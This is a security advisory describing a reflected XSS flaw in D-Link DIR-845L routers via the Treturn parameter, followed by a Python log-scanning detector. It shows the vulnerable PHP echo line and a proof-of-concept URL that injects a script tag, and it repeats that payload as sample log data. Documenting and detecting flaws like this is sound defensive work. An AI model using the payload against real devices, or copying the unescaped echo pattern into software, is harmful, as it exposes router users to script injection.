D-Link DIR-845L router is vulnerable to Cross Site Scripting (XSS) via /htdocs/webinc/js/bsc_sms_inbox.php.
D-Link DIR-845L routers version 1.01KRb03 and below are vulnerable to Cross Site Scripting (XSS) via /htdocs/webinc/js/bsc_sms_inbox.php.
Vulnerable Component
/htdocs/webinc/js/bsc_sms_inbox.php
Technical Details
The vulnerability is due to the lack of filtering of the $_GET["Treturn"] parameter, which is used directly in the code on line 17 of bsc_sms_inbox.php. The value is echoed unescaped into a single-quoted JavaScript string literal.
The vulnerable code snippet:
var get_Treturn = '`<?if($_GET["Treturn"]=="") echo "0"; else echo $_GET["Treturn"];?>';
PoC
http://IP:8080/bsc_sms_inbox.php?Treturn=%27%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E
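Detection example (added here, not part of the original advisory or of D-Link's code): a Python check that flags logged requests to bsc_sms_inbox.php whose Treturn value is anything other than empty or ASCII digits. The digits-only expectation (inferred from the "0" default in the snippet above), the common log format, and the sample log lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in common log format (documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /bsc_sms_inbox.php HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /bsc_sms_inbox.php?Treturn=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:02:11 +0000] "GET /bsc_sms_inbox.php?Treturn='
    '%27%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E HTTP/1.1" 200 5200',
    '192.0.2.10 - - [01/Jan/2024:10:03:00 +0000] "GET /index.php?Treturn=abc HTTP/1.1" 200 100',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
TARGET_PAGE = "/bsc_sms_inbox.php"
# Assumption: a legitimate Treturn is empty (rendered as "0") or ASCII digits only.
BENIGN_RE = re.compile(r"[0-9]*")


def suspicious_treturn(line):
    """Return the decoded Treturn value if the request should be flagged, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.endswith(TARGET_PAGE):
        return None
    # parse_qs percent-decodes, so encoded quotes and angle brackets are seen in clear.
    for value in parse_qs(url.query, keep_blank_values=True).get("Treturn", []):
        if not BENIGN_RE.fullmatch(value):
            return value
    return None


def scan(lines):
    """Return (line_index, decoded_value) for every flagged log line."""
    hits = []
    for index, line in enumerate(lines):
        value = suspicious_treturn(line)
        if value is not None:
            hits.append((index, value))
    return hits


if __name__ == "__main__":
    for index, value in scan(SAMPLE_LOG):
        print(f"line {index}: Treturn={value!r}")
```

The same digits-only rule applied server-side before the value is echoed would keep quotes and script tags out of the rendered string.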